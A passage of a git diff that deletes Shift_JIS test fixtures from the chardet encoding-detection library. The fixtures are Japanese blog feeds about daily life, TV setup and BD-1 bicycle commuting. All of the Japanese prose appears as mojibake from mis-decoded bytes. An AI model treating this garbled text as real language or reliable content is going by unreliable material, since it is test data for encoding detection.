    - -‚·‚ס‚²‚¢‹v‚µ‚װ‚ט‚ֹVh -http://tamuyou.haun.org/mt/archives/2005/12/post_374.html -‰ִ‚ֹ—ˆ‚½‚ֶ‚«‚ֽ‚©‚ָ‚ט‚ֱ‚ִ‚¢‚½‚ּ‚ֵƒVƒ‰ƒt‚ֵVh‚ֹ—ˆ‚½‚ּ‚ֽ‚¸‚¢‚װ‚ס‘O‚¾‚ָB‚ָ‚ַ‚ֶv‚¢‚ָ‚ׂח‚Z‚ּד”y‚ֶ‘ׂ‚¿‡‚ם‚¹B
    -ƒ‹ƒ~ƒl‚ּƒƒXƒgƒ‰ƒ“X‚נ‘ׂ‚¿‡‚ם‚¹ך‚ֹ‚µ‚½‚ּ‚¾‚×Aב‚¢—«‚־‚©‚ט‚ֵ‚©‚ָ‚ט’p‚¸‚©‚µ‚¢i‚—

    - -

    @‚‚ –‚ּ•—{‚ֶ‚¢‚₪´‚¶‚ֵ•‚‚ח‚ָ‚¢‚ז‚₪‚ֹ’ˆ׃‚µ‚ִד”y‚נ‘ׂ‚ֲB–³–‡—¬‚µ‚½‚ּ‚¾‚׃‹ƒ~ƒl‚ּƒƒXƒgƒ‰ƒ“X‚ֽƒhƒRƒ‚€¬‚B‚®‚י‚ֱ‚ֶ‰ס‚ֱ‚ִ‚©‚ח¼‚ײo‚י‚±‚ֶ‚ֹBד”y‚׈ך“xs‚±‚₪‚ֶ‚µ‚ִ“‚ך‚ָ‚©‚ֱ‚½ƒnƒCƒ`—¿—‚ּ“X‚ֹ“‚י‚±‚ֶ‚ֹ‚µ‚½B
    -@‚±‚±‚ֽלט‚ֵ“‚ֱ‚½‚±‚ֶ‚ׂ ‚יƒ`ƒF[ƒ““X‚©‚ָ‚‚ֶv‚¢‚ֲ‚ֲ“‚ֱ‚ִ‚‚½‚×C‚ג‚ֽ‚ט‚»‚₪‚¾‚ֱ‚½B‚½‚¾לט‚ֵ‚ֽƒ‰ƒ“ƒ`‚µ‚©H‚׳‚ִ‚ָ‚©‚ֱ‚½‚ּ‚ֵC–י‚ּƒƒjƒ…[‚ֽV‘N‚¾‚ֱ‚½B
    -@‚©‚ָ‚ט”Z‚¢‚‚ּ–¡•t‚¯‚ֵנ‚ֹ‚ז‚­‡‚₪´‚¶B‚¿‚ו‚±‚¿‚ו‚±‚ֲ‚‚‚ָ‚ׂחCd–‚ּ˜b‚ָ‚ַ‚נ‚µ‚½‚ט‚µ‚ִi‚—

    - -

    ‚»‚ּד@ƒ}ƒbƒN‚ָֹ‚נˆ‚µ‚ִCƒfƒU[ƒgB‚¢‚ג[@y‚µ‚¢–י‚ֵ‚ ‚ֱ‚½

    ]]>
    -‰ִ‚ֹ—ˆ‚½‚ֶ‚«‚ֽ‚©‚ָ‚ט‚ֱ‚ִ‚¢‚½‚ּ‚ֵƒVƒ‰ƒt‚ֵVh‚ֹ—ˆ‚½‚ּ‚ֽ‚¸‚¢‚װ‚ס‘O‚¾‚ָB‚ָ‚ַ‚ֶv‚¢‚ָ‚ׂח‚Z‚ּד”y‚ֶ‘ׂ‚¿‡‚ם‚¹B
    -ƒ‹ƒ~ƒl‚ּƒƒXƒgƒ‰ƒ“X‚נ‘ׂ‚¿‡‚ם‚¹ך‚ֹ‚µ‚½‚ּ‚¾‚×Aב‚¢—«‚־‚©‚ט‚ֵ‚©‚ָ‚ט’p‚¸‚©‚µ‚¢i‚—

    - -

    @‚‚ –‚ּ•—{‚ֶ‚¢‚₪´‚¶‚ֵ•‚‚ח‚ָ‚¢‚ז‚₪‚ֹ’ˆ׃‚µ‚ִד”y‚נ‘ׂ‚ֲB–³–‡—¬‚µ‚½‚ּ‚¾‚׃‹ƒ~ƒl‚ּƒƒXƒgƒ‰ƒ“X‚ֽƒhƒRƒ‚€¬‚B‚®‚י‚ֱ‚ֶ‰ס‚ֱ‚ִ‚©‚ח¼‚ײo‚י‚±‚ֶ‚ֹBד”y‚׈ך“xs‚±‚₪‚ֶ‚µ‚ִ“‚ך‚ָ‚©‚ֱ‚½ƒnƒCƒ`—¿—‚ּ“X‚ֹ“‚י‚±‚ֶ‚ֹ‚µ‚½B
    -@‚±‚±‚ֽלט‚ֵ“‚ֱ‚½‚±‚ֶ‚ׂ ‚יƒ`ƒF[ƒ““X‚©‚ָ‚‚ֶv‚¢‚ֲ‚ֲ“‚ֱ‚ִ‚‚½‚×C‚ג‚ֽ‚ט‚»‚₪‚¾‚ֱ‚½B‚½‚¾לט‚ֵ‚ֽƒ‰ƒ“ƒ`‚µ‚©H‚׳‚ִ‚ָ‚©‚ֱ‚½‚ּ‚ֵC–י‚ּƒƒjƒ…[‚ֽV‘N‚¾‚ֱ‚½B
    -@‚©‚ָ‚ט”Z‚¢‚‚ּ–¡•t‚¯‚ֵנ‚ֹ‚ז‚­‡‚₪´‚¶B‚¿‚ו‚±‚¿‚ו‚±‚ֲ‚‚‚ָ‚ׂחCd–‚ּ˜b‚ָ‚ַ‚נ‚µ‚½‚ט‚µ‚ִi‚—

    - -

    ‚»‚ּד@ƒ}ƒbƒN‚ָֹ‚נˆ‚µ‚ִCƒfƒU[ƒgB‚¢‚ג[@y‚µ‚¢–י‚ֵ‚ ‚ֱ‚½

    ]]>
    -g•׃ -tamuyou -2005-12-26T19:33:44+09:00 -
    - -’nƒfƒW‚«‚ך‚¢‚ֵ‚·‚ֻ -http://tamuyou.haun.org/mt/archives/2005/12/post_373.html -¡“ת‚ֽ‹x‰ֹi‚—

    - -

    _‚³‚ס‚נ‘—‚ֱ‚½ד‚ֽA‚³‚ֱ‚»‚­נ“ת” ‚©‚חo‚µ‚½‰t»ƒeƒƒr‚ּ’טJnB–ג‘ט‚ֽ»˜^‰ז‹@‚ֽˆך״ƒfƒWƒ^ƒ‹‰»‚µ‚ִ‚ָ‚¢‚ֶ‚¢‚₪‚±‚ֶ‚ֶAV‚µ‚¢ƒeƒƒr‚ֽBSƒAƒiƒƒO‚ֹ‘־‰‚µ‚ִ‚ָ‚¢‚±‚ֶ‚¾B‚ֲ‚₪‚©A‚±‚ס‚ָ‚ֹ‘‚­ƒfƒWƒ^ƒ‹‘־‰ƒeƒƒr‚נט‚ֹ“‚ך‚י—\’ט‚¶‚ב‚ָ‚©‚ֱ‚½‚ּ‚ֵEEEEi¾
    -@»‹’·װ‚ֵּ‚א’·‚¢BSƒAƒiƒƒOiWOWOWj‚נTV‚¾‚¯‚¶‚ב©‚ח‚ך‚ָ‚¢‚ס‚¾‚ז‚ֻ[@‚±‚ּ‚‚‚¶‚בB‚µ‚©‚µA_‚³‚ס‚ֽWOWOW‚ ‚ס‚‚ט‚‚ָ‚¢‚©‚ח‚ָi‚—B‚ֶ‚ט‚ ‚¦‚¸‹A‚ֱ‚ִ‚«‚½_‚³‚ס‚׃eƒƒr‚נ©‚ח‚ך‚ָ‚¢‚ס‚¶‚ב€“{‚ט‚ֹ‚ָ‚י‚±‚ֶ•K€‚ָ‚ּ‚ֵ’nד”g—Dז‚ֵ’טJnB‚ָ‚ס‚ֶ‚©’‹‘O‚ֹ’nƒfƒW‚ּ’ט‚×®—¹H

    - -

    @‘±‚¢‚ִ’nדƒAƒiƒƒO‚ּ’ט®—¹B‚±‚±‚ֵ’nƒfƒWA’nƒAƒi‚ּ”הrJnB‚₪[‚ס@ƒuƒ‰ƒEƒ“ַ29ƒCƒ“ƒ`‚ּ’nƒAƒi‚ֶ”ה‚׳‚י‚ֶ‚ַ‚₪‚ָ‚ּ‚©”ק–­‚¾‚×A‰t»‚ֵ’nƒfƒW‚ֶ’nƒAƒi‚נ”ה‚׳‚י‚ֶ‚ ‚‚ט‚ֹ‚אˆב‚₪‚ָB‚³‚ח‚ֹ’nƒfƒW‚ֽ’nƒAƒi‚ז‚ט‰ז–‚×L‚¢[Bu־‚ֱ‚ִ‚¢‚¢‚ֶ‚אv‚ָ‚ס‚ִ’nƒAƒi‚¾‚ֶA‚½‚¢‚ִ‚¢ƒ^ƒ‚ƒ‚׉ז–‚¬‚ט‚¬‚ט‚¾‚×A’nƒfƒW‚¾‚ֶƒ^ƒ‚ƒ‚ּד‚כ‚ֹ‚א‚₪ˆךl‚®‚ח‚¢‚יL‚³B‚ײ‚¥BBBB

    - -

    BSƒfƒWƒ^ƒ‹‚א‚י‚ז‚₪‚ֹ‚ָ‚ֱ‚½‚ּ‚ֵ‚±‚ך‚ֵ‚a‚r|‚‰‚¾‚¯‚ּƒTƒbƒJ[’†p‚א‘וה•v‚©Hˆך‰A‚g‚c‚cƒƒR[ƒ_[‚ּ‚q‚c|‚˜‚S‚U‚ֶ‚א˜A“®ƒƒ‚ƒRƒ“’ט‚ֹ¬ק‚µ‚½‚ס‚ֵAV‚µ‚¢ƒƒ‚ƒRƒ“ˆך‘ה‚ֵ‚ָ‚ס‚ֶ‚©‚ָ‚ט‚»‚₪‚¾‚ָB
    -‚‚ֱ‚ֶˆך‘§B

    ]]>
    -¡“ת‚ֽ‹x‰ֹi‚—

    - -

    _‚³‚ס‚נ‘—‚ֱ‚½ד‚ֽA‚³‚ֱ‚»‚­נ“ת” ‚©‚חo‚µ‚½‰t»ƒeƒƒr‚ּ’טJnB–ג‘ט‚ֽ»˜^‰ז‹@‚ֽˆך״ƒfƒWƒ^ƒ‹‰»‚µ‚ִ‚ָ‚¢‚ֶ‚¢‚₪‚±‚ֶ‚ֶAV‚µ‚¢ƒeƒƒr‚ֽBSƒAƒiƒƒO‚ֹ‘־‰‚µ‚ִ‚ָ‚¢‚±‚ֶ‚¾B‚ֲ‚₪‚©A‚±‚ס‚ָ‚ֹ‘‚­ƒfƒWƒ^ƒ‹‘־‰ƒeƒƒr‚נט‚ֹ“‚ך‚י—\’ט‚¶‚ב‚ָ‚©‚ֱ‚½‚ּ‚ֵEEEEi¾
    -@»‹’·װ‚ֵּ‚א’·‚¢BSƒAƒiƒƒOiWOWOWj‚נTV‚¾‚¯‚¶‚ב©‚ח‚ך‚ָ‚¢‚ס‚¾‚ז‚ֻ[@‚±‚ּ‚‚‚¶‚בB‚µ‚©‚µA_‚³‚ס‚ֽWOWOW‚ ‚ס‚‚ט‚‚ָ‚¢‚©‚ח‚ָi‚—B‚ֶ‚ט‚ ‚¦‚¸‹A‚ֱ‚ִ‚«‚½_‚³‚ס‚׃eƒƒr‚נ©‚ח‚ך‚ָ‚¢‚ס‚¶‚ב€“{‚ט‚ֹ‚ָ‚י‚±‚ֶ•K€‚ָ‚ּ‚ֵ’nד”g—Dז‚ֵ’טJnB‚ָ‚ס‚ֶ‚©’‹‘O‚ֹ’nƒfƒW‚ּ’ט‚×®—¹H

    - -

    @‘±‚¢‚ִ’nדƒAƒiƒƒO‚ּ’ט®—¹B‚±‚±‚ֵ’nƒfƒWA’nƒAƒi‚ּ”הrJnB‚₪[‚ס@ƒuƒ‰ƒEƒ“ַ29ƒCƒ“ƒ`‚ּ’nƒAƒi‚ֶ”ה‚׳‚י‚ֶ‚ַ‚₪‚ָ‚ּ‚©”ק–­‚¾‚×A‰t»‚ֵ’nƒfƒW‚ֶ’nƒAƒi‚נ”ה‚׳‚י‚ֶ‚ ‚‚ט‚ֹ‚אˆב‚₪‚ָB‚³‚ח‚ֹ’nƒfƒW‚ֽ’nƒAƒi‚ז‚ט‰ז–‚×L‚¢[Bu־‚ֱ‚ִ‚¢‚¢‚ֶ‚אv‚ָ‚ס‚ִ’nƒAƒi‚¾‚ֶA‚½‚¢‚ִ‚¢ƒ^ƒ‚ƒ‚׉ז–‚¬‚ט‚¬‚ט‚¾‚×A’nƒfƒW‚¾‚ֶƒ^ƒ‚ƒ‚ּד‚כ‚ֹ‚א‚₪ˆךl‚®‚ח‚¢‚יL‚³B‚ײ‚¥BBBB

    - -

    BSƒfƒWƒ^ƒ‹‚א‚י‚ז‚₪‚ֹ‚ָ‚ֱ‚½‚ּ‚ֵ‚±‚ך‚ֵ‚a‚r|‚‰‚¾‚¯‚ּƒTƒbƒJ[’†p‚א‘וה•v‚©Hˆך‰A‚g‚c‚cƒƒR[ƒ_[‚ּ‚q‚c|‚˜‚S‚U‚ֶ‚א˜A“®ƒƒ‚ƒRƒ“’ט‚ֹ¬ק‚µ‚½‚ס‚ֵAV‚µ‚¢ƒƒ‚ƒRƒ“ˆך‘ה‚ֵ‚ָ‚ס‚ֶ‚©‚ָ‚ט‚»‚₪‚¾‚ָB
    -‚‚ֱ‚ֶˆך‘§B

    ]]>
    -g•׃ -tamuyou -2005-12-26T16:30:52+09:00 -
    - - -
    \ No newline at end of file diff --git a/chardet/tests/SHIFT_JIS/y-moto.com.xml b/chardet/tests/SHIFT_JIS/y-moto.com.xml deleted file mode 100644 index 89c5018..0000000 --- a/chardet/tests/SHIFT_JIS/y-moto.com.xml +++ /dev/null @@ -1,606 +0,0 @@ - - - -BD-1‚ֵyX’‹־`BD-wonderful - -2006-01-03T14:04:04Z -‚טפ‚©“]װBD-1‚ֵ•׀“¹16‚‹‚‚ּ©“]װ’‹־‚נ‚µ‚ִ‚¨‚ט‚‚·BBD-Wonderful Life‚ײ‚ז‚₪‚±‚»I -tag:www.y-moto.com,2006:/bd-1//1 -Movable Type -Copyright (c) 2006, y-moto - -‚³‚ח‚ָ‚י–h¦‘־פ - -2006-01-03T14:04:04Z -2006-01-03T14:00:58Z -tag:www.y-moto.com,2006:/bd-1//1.507 -2006-01-03T14:00:58Z -@‚¨³‚א¡“ת‚ֵI‚ם‚טB‚‚½–¾“ת‚©‚ח©“]... - -y-moto -http://www.y-moto.com/ -birdy@y-moto.com - -ˆ— - -@‚¨³‚א¡“ת‚ֵI‚ם‚טB‚‚½–¾“ת‚©‚ח©“]װ’‹־ִJ‚ֵ‚·B¡’©‚ֽ‘O“ת‚ּ‰J‚ֵ“¹˜H‚׬•ְ‚ƒAƒCƒXƒo[ƒ“‚ֹ‚ָ‚ֱ‚ִ‚‚µ‚½B—eֽ‚µ‚ִ‚­‚ך‚‚¹‚סi—jB

    - -

    @¦‚¢‚ּ‚ֽ‚±‚ך‚©‚ח‚×–{i‰»BX‚ָ‚י–h¦‘־פ‚וK—v‚¾‚ֶv‚¢‚‚·B

    - -

    698.jpg

    - -

    @¡“x‚ֽƒXƒyƒVƒƒƒ‰ƒCƒYƒh‚ּƒƒbƒOƒEƒH[ƒ}[Bƒ^ƒCƒc‚ז‚ט‚א’E‚¬’…‚×ָ’P‚ֵƒ[ƒT[ƒpƒ“ƒc‚ֹ‚א‡‚¢‚‚·‚ֻB’‹־‚ֹ‚ֽƒ[ƒpƒ“‚ֽ’…‚‚¹‚ס‚×Aƒ^ƒCƒc‘ד‚ם‚ט‚ֹ‚א‚ָ‚ט‚‚·‚ֻB

    - -

    @¡‚ֽƒ^ƒCƒc‚ֵ‚·‚×A‚א‚₪­‚µ’g‚©‚­‚ָ‚ך‚־‚±‚ֱ‚¿‚ּ•‚׃CƒC‚ּ‚©‚א’m‚ך‚‚¹‚סB

    - -

    @–¾“ת‚©‚ח—–‚ֵ’‹־‚ֵ‚·(T_T)

    ]]> - -
    -
    - -‰wƒ|ƒ^ - -2006-01-02T02:16:37Z -2006-01-01T23:55:55Z -tag:www.y-moto.com,2006:/bd-1//1.506 -2006-01-01T23:55:55Z -@V”N–¾‚¯‚‚µ‚ִ‚¨‚‚ֵ‚ֶ‚₪‚²‚´‚¢‚‚·B¡... - -y-moto -http://www.y-moto.com/ -birdy@y-moto.com - -ƒ|ƒ^ƒƒ“ƒO - -@V”N–¾‚¯‚‚µ‚ִ‚¨‚‚ֵ‚ֶ‚₪‚²‚´‚¢‚‚·B¡”N‚אuBD-1‚ֵyX’‹־v‚נ‚ז‚כ‚µ‚­‚¨ט‚¢‚µ‚‚·B_(_^_)_

    - -

    @©‘מ`ˆף׳ְCR`@ב—ל“°`¬“cRV›`ˆף׳ְCR`©‘מ

    - -

    687.jpg

    - -

    @

    ]]> -@¡”N‚א¬“cR‚‚ֵ‘–‚י‚±‚ֶ‚ֹ‚µ‚‚µ‚½B¡”N‚ֵ3‰ס–‚ֵ‚·B©‘מ‚©‚חˆף׳ְCR‚ֹo‚ִ@ב—ל“°‚נ”²‚¯‚ִ¬“c‚‚ֵs‚«‚‚·BO‚דת‚ּ“V‹C‚×–¾“תi2“תj‚׉J‚©ב‚ֶ‚¢‚₪‚±‚ֶ‚ֵA‚א‚µ‚©‚·‚י‚ֶב‚¾‚ֶ3“ת‚אכ‚ָ‚¢B•—‚א‰¸‚ג‚©‚ָ‚ּ‚ֵ¡“תi³’Uj‘–‚י‚±‚ֶ‚ֹ‚µ‚‚µ‚½B‚µ‚©‚µQ–V‚µ‚ִ‰ֶ‚נo‚י‚ּ‚ׂ¨’‹‘O(+_+)

    - -

    @“¹‚ּ‰w‚ג‚¿‚ז“’…B‚³‚·‚ֹׂ‰c‹ֶ‚µ‚ִ‚¢‚ָ‚¢‚ּ‚ֵ’N‚א‚¢‚ָ‚¢BO‚דת‚ֽ‹x‚‚ּ‚ז‚₪‚ֵ‚ ‚יB

    - -

    688.jpg

    - -

    @ˆף׳ְCR‚נ‘–‚יi•–¼§“¹406†jB—¬־‚ֹ³’U‘X‘–‚ֱ‚ִ‚¢‚יl‚ֽ­‚ָ‚¢‚ּ‚ֵ‰ץ’²‚ֹ‘–‚ך‚‚·B–k•—‚אד‚‚ֵ‚·B“~‚ֽ’‚א‚¢‚ָ‚¢‚ּ‚ֵ‰ץ“K(^^פ

    - -

    689.jpg

    - -

    @²‘q‚ּ•—װiƒƒt[ƒej‚ֹ“’…B‚±‚±‚א‚׀‚ֱ‚»‚ט‚ֶ‚µ‚ִ‚¢‚‚·B‚ַ‚ס‚ז‚ט‚ֶ‚µ‚½‰_‚ֹx”z‚³‚ך‚ִ‚¢‚‚·B•xmR‚ֶ’}”gR‚ּ©‚¦‚יƒ|ƒCƒ“ƒg‚ָ‚ס‚ֵ‚·‚×A”q‚‚‚¹‚סB

    - -

    691.jpg690.jpg

    - -

    @@ב—ל“°“’…B@ב—ל“°‚ֶ‚ֽ]ֻ‘ד‚ֹ‚±‚ּ‚ ‚½‚ט‚ּ–¼ו‘‘ד‚¾‚ֱ‚½²‘q@בi–״“א‘y˜Yj‚׋¥ל‚ֶ‹Qי[‚ֹ‚ ‚¦‚®”_–¯‚נ‹~‚₪‚½‚A]ֻ‚ֹo‚ִ‚S‘ד«R‰ֶj‚ֹ’¼‘i‚נˆs‚µ‚‚µ‚½‚ׂ ‚¦‚ָ‚­•‚ח‚¦‚ח‚ךˆY‚³‚ך‚ִ‚µ‚‚¢‚‚µ‚½B‚»‚ס‚ָ²‘q@ב‚×גJ‚ח‚ך‚ִ‚¢‚יB‹‚­‚ֹ‚ֽ²‘q@ב‚ּ‹‘מ‚ׂ ‚יB‚»‚ּ‘O‚ּ“¹‚אu’¼‘i“¹v‚ֶ–¼•t‚¯‚ח‚ך‚ִ‚¢‚יB‚ ‚ּuQ‚¿‚ב‚סv‚א‚±‚±‚ֹ‰w‚ֹ—ˆ‚י‚ח‚µ‚¢B

    - -

    692.jpg

    - -

    @¬“cR‚ײ‚₪B¬“cR‚ײ‚ֽ©“]װ‚וײ—˜‚¾B’“װך‚ּS”z‚ֽ‚¢‚ח‚ָ‚¢‚µAנ’‹K§‚ֽ‚ג‚ֱ‚ִ‚¢‚י‚µA“r’†‚ּQ“¹‚³‚¦‰‚µ‚ִ•א‚¯‚־‹«“א‚ּ’†‚‚ֵ“‚ך‚יB‚ג‚ֽ‚ט³’U‚ֽ‚·‚²‚¢l‚¾‚ֱ‚½B‚P”Nװg‚ֱ‚ִ‚¢‚½הח‚ט‚נ”[‚‚ִA‚‚½V‚½‚ֹהח‚ט‚נ”ƒ‚₪‚×”ƒ‚₪‚ּ‚ֹ‚אˆך‹ך˜JB‚‚½‚P”N‚±‚ּהח‚ט‚ּ‚¨¢˜b‚ֹ‚ָ‚יB

    - -

    693.jpg694.jpg

    - -

    @‚¨• ‚׸‚ֱ‚½‚ּ‚ֵ‚ַ‚±‚©‚ֵ”ׁI‚ֶv‚ֱ‚½‚ּ‚¾‚×AQ“¹‚ּ“X‚ֽ‚ַ‚±‚א‚·‚²‚¢lB‚ָ‚ּ‚ֵ’Eo‚µAצ’ֳ‚ּ“m‚ּƒVƒ‡ƒbƒsƒ“ƒOƒZƒ“ƒ^[‚ײBƒVƒ‡ƒbƒsƒ“ƒOƒZƒ“ƒ^[‚א‚·‚²‚¢lB‚»‚±‚ֵ’‹Hi^‚ָ‚µjBש‚ֹ‚ֽ—[•4‘O‚ֵƒiƒCƒgƒ‰ƒ“mְB

    - -

    @ˆף׳ְCR‚נ–‚יB‚ם‚¸‚©‚ָץ‚נ—‚ט‚ֹEEEB‚ט‚ֹ‚ֽ‰½‚א‚ָ‚¢Bד‚כ‚ּƒe[ƒ‹ƒ‰ƒCƒg‚×EEEB‚ָ‚¢B‚ַ‚±‚©‚ֹ—‚ֶ‚µ‚½‚ז‚₪‚ֵ‚ ‚ט‚‚·Bi‘½•׬“cR‚ֵj‚ֶ‚ט‚ ‚¦‚¸ƒoƒbƒN©‘ּ‚אƒƒtƒƒNƒ^[‚וt‚¢‚ִ‚¢‚י‚ּ‚ֵ‘וה•v‚¾‚ֶ‚ֽv‚¢‚‚·‚×EEEB“¹‚ּ‰w‚ג‚¿‚ז‚ֹ“’…‚ּ ‚ֹ‚ֽ‚ֶ‚ֱ‚ױ‚ט‚ֶ“ת‚וי‚ך‚‚µ‚½B

    - -

    695.jpg

    - -

    @ֿZ‹——£ 78.4km@ˆ“®•½‹ֿ‘¬@18.1km/h@ֵ‚‘¬“x 42.5km/h

    - -

    696.jpg

    - -

    @ƒtƒ[ƒpƒbƒNƒƒ^2‚ֽg‚¢ט‚¢‚¢‚ֵ‚·‚ֻB‘ּ‚ֹ‰½‚א‚ֲ‚¯‚¸‚ֹ‘–‚י‚ּ‚ֽy‚ֵ‚·B

    - -

    697.jpg

    ]]> -
    -
    - -”Nװ‘–s‹——£•ס`—ַ‚¢‚¨”N‚נI - -2005-12-31T13:09:12Z -2005-12-31T12:55:11Z -tag:www.y-moto.com,2005:/bd-1//1.505 -2005-12-31T12:55:11Z -@¡“ת‚ֽ‘וA“תB3‚ֲ‚‚ֶ‚‚ִ‹——£•ס @... - -y-moto -http://www.y-moto.com/ -birdy@y-moto.com - -‘–s‹——£•ס - -@¡“ת‚ֽ‘וA“תB3‚ֲ‚‚ֶ‚‚ִ‹——£•ס

    - -

    @‚‚¸Tװ‘–s‹——£•ס‚©‚ח

    - -

    @¡T‚ּֿZ‹——£ 145km@ˆ“®•½‹ֿ‘¬@18.8km/h@ֵ‚‘¬“x 38.4km/h

    - -

    @12‚ּ—ב‘–s‹——£•ס@19“ת@639km

    - -

    @”Nװ‘–s‹——£‚ֽ@7,370km@ƒWƒƒƒWƒƒ[ƒ“I(^_^)v

    - -

    @‚ֶ‚ט‚ ‚¦‚¸–•W‚ֹ‚µ‚ִ‚¢‚½600km‚ּ–•W‚ֽ’B¬‚³‚ך‚‚µ‚½B!(^^)!

    - -

    @‚»‚µ‚ִ2002”N‚ז‚ט‚ּ’Z‘–s‹——£‚ֽ19,887km‚ֵ‚·B

    - -

    @’n‹…”¼‚ֽ—ˆ”N‚ֹ‚¿‰z‚µ‚ֹ‚ָ‚ט‚‚µ‚½B

    - -

    @‰½–‚א–•W‚נ‚ֲ‚±‚ֶ‚ֽ‚¢‚¢‚±‚ֶ‚¾‚ֶv‚¢‚‚·Bֹ‚ג‚©‚ָ–•W‚נ‚ִ‚־’£‚ט‡‚¢‚×o‚י‚µAצ•\‚·‚ך‚־ד‚ֹ‚ֽˆר‚¯‚ָ‚¢‚ֶ‚¢‚₪‚±‚ֶ‚ֹ‚ָ‚ֱ‚ִA‚¢‚¢—ד‚‚ֹ‚ָ‚ט‚‚·B

    - -

    @¦uBD-1‚ֵ’n‹…ˆךvEEEװ“¹ˆךT40,000km‚נBD-1‚ֵ–w‚·BƒTƒCƒNƒ‹ƒRƒ“ƒsƒ…[ƒ^[ז‚ט•t‚¯ˆָ‘O‚ֽƒm[ƒJƒEƒ“ƒgB2002”N‚©‚ח‚ּ‘–s‹——£ƒf[ƒ^[‚נ’Z‚µ‚ִ‚¢‚‚·B

    - -

    @¡”N‚ֽ–{“–‚ֹ1”N‚נ’‚¶‚ִ–‘«‚ֹז‚ך‚½‚ֶv‚¢‚‚·B–ּ‚א‚ָ‚©‚ֱ‚½‚ֵ‚·‚µi“]“|‚ֽ‚ ‚ט‚‚µ‚½‚¯‚ַEEEjB

    - -

    @‚‚½—ˆ”N‚א¡”N‚ֶ“¯‚¶‚­‚ח‚¢‚ּ‘–sƒy[ƒX‚ֵs‚«‚½‚¢‚ֶv‚ֱ‚ִ‚‚·B‚‚½—ˆ”N‚א‚ז‚כ‚µ‚­‚¨ט‚¢‚µ‚‚·B<(_ _)>

    ]]> - -
    -
    - -ƒtƒ[ƒpƒbƒNƒƒ^2g—p´ - -2005-12-30T23:00:20Z -2005-12-30T23:00:18Z -tag:www.y-moto.com,2005:/bd-1//1.504 -2005-12-30T23:00:18Z -@ז“תw“‚µ‚½ƒƒNƒZƒ“ƒJƒEƒ‹‚ּƒtƒ[ƒpƒb... - -y-moto -http://www.y-moto.com/ -birdy@y-moto.com - -‚¿‰ס‚ט•i - -@ז“תw“‚µ‚½ƒƒNƒZƒ“ƒJƒEƒ‹‚ּƒtƒ[ƒpƒbƒNƒƒ^2‚דֽ‚¢‚½‚ּ‚ֵ‘‘¬g‚ֱ‚ִ‚‚י‚±‚ֶ‚ֹ‚µ‚‚µ‚½B

    - -

    @“ֱ’¥‚ֽ‚ָ‚ס‚ֶ¾‚ֱ‚ִ‚א‚½‚¾‚ּƒfƒBƒoƒbƒN‚ֵ‚ֽ‚ָ‚¢B•”„‚ט‚ּƒGƒNƒXƒeƒ“ƒ_[‚נƒV[ƒgƒ|ƒXƒg‚ֹז‚ט•t‚¯‚ך‚־A©“]װ‚ֹƒƒ“ƒ^ƒbƒ`‚ֵז‚ט•t‚¯‚ח‚ך‚‚·‚ּ‚ֵƒfƒBƒoƒbƒN‚נ”w•‰‚₪•K—v‚א‚ָ‚¢B“ֱ‚ֹ‰ִך‚ֽ‚±‚ך‚ֽ•‚©‚יB

    - -

    684.jpg

    - -

    @—e—‚ֽ26ƒƒbƒgƒ‹Bƒ|ƒPƒbƒg‚ׂ¢‚ֱ‚ֿ‚¢•t‚¢‚ִ‚¢‚י‚ּ‚ֵ—e—“I‚ֹ‚ֽ–ג‘ט‚ָ‚³‚»‚₪BƒƒCƒ“ƒJƒp[‚א•t‚¢‚ִ‚¢‚י‚ּ‚ֵ‰J‚ֵ‚אˆְSBƒƒtƒƒNƒ^[‚א•t‚¢‚ִ‚¢‚יB‘¢‚ט‚»‚ּ‚א‚ּ‚ֽdת‚ֵƒ`ƒ‡ƒbƒg‚ג‚»‚ֱ‚ֶ‚¶‚ב^•צ‚ך‚µ‚ָ‚¢BƒƒNƒZƒ“ƒJƒEƒ‹‚ּ—ַ‚³‚ֽה•v‚ָ‚±‚ֶB‚¢‚©‚ֹ‚א‘¢‚ט‚׃hƒCƒc»‚ֱ‚ִ´‚¶BƒoƒbƒN‚ֶ‚µ‚ִ‚ּ®¬“x‚ֽƒXƒSƒCB

    - -

    685.jpg

    - -

    @‚±‚ך‚ָ‚ח1”‘’צ“x‚ּ—·s‚ֹ‚א‚¿‚ו‚₪‚ַ‚¢‚¢B—ײs‚ֹ‚א•ײ—˜iƒwƒ‹ƒƒbƒg‚אז‚ט•t‚¯‚ח‚ך‚יjB¡‚‚ֵ‘–‚י‚ֽƒfƒBƒoƒbƒN‚נ”נ‚¯‚ִ‚‚µ‚½‚×Aƒ|ƒ^ƒƒ“ƒO‚ָ‚ַ‚ּ‹Cy‚ָˆ“®‚ֹ‚ֽƒfƒBƒoƒbƒN‚ׂ¢‚ִ‚¢‚יB©“]װ‚©‚ח—£‚ך‚י‚ֶ‚«‚ֽ‚»‚ּ‚‚”w•‰‚¦‚־ˆב˜a´‚ָ‚¢B

    - -

    686.jpg

    - -

    @ƒGƒNƒXƒeƒ“ƒ_[‚ֶ‚ּז‚ט•t‚¯‚ֽ‰^‚ּ‹א‘®–_‚וt‚¢‚ִ‚¢‚יB‚»‚ך‚ֹƒGƒNƒXƒeƒ“ƒ_[‚ֹˆר‚ֱ|‚¯‚יBƒ}ƒbƒ`ƒpƒbƒN‚ֶ“¯‚¶BƒWƒ‡ƒCƒ“ƒg‚ׂך‚יS”z‚ֽ‚ָ‚¢B

    - -

    @ד“_‚ֶ‚µ‚ִ‚ֽƒTƒhƒ‹‚ֹ‚ז‚י‚ּ‚©‚א’m‚ך‚‚¹‚ס‚×AƒoƒbƒN‚נƒGƒNƒXƒeƒ“ƒ_[‚ֹז‚ט•t‚¯‚י‚ּ‚׋\‘ו•ֿ‚ֵ‚·BƒGƒNƒXƒeƒ“ƒ_[‚ּ‘«‚ׂא‚₪­‚µ’·‚¯‚ך‚־‰נˆ‚·‚י–ג‘טB‚ַ‚¿‚ח‚©‚ֶ‚¢‚₪‚ֶƒGƒNƒXƒeƒ“ƒ_[‘₪‚ּ–ג‘ט‚©‚א‚µ‚ך‚‚¹‚ס‚×EEEB

    - -

    @¡ד‚ּƒ|ƒ^ƒƒ“ƒO‚ג—ײsA‚¿‚ו‚ֱ‚ֶ‚µ‚½‚¨o‚©‚¯‚ֹg‚¨‚₪‚ֶv‚ֱ‚ִ‚¨‚ט‚‚·B

    ]]> - -
    -
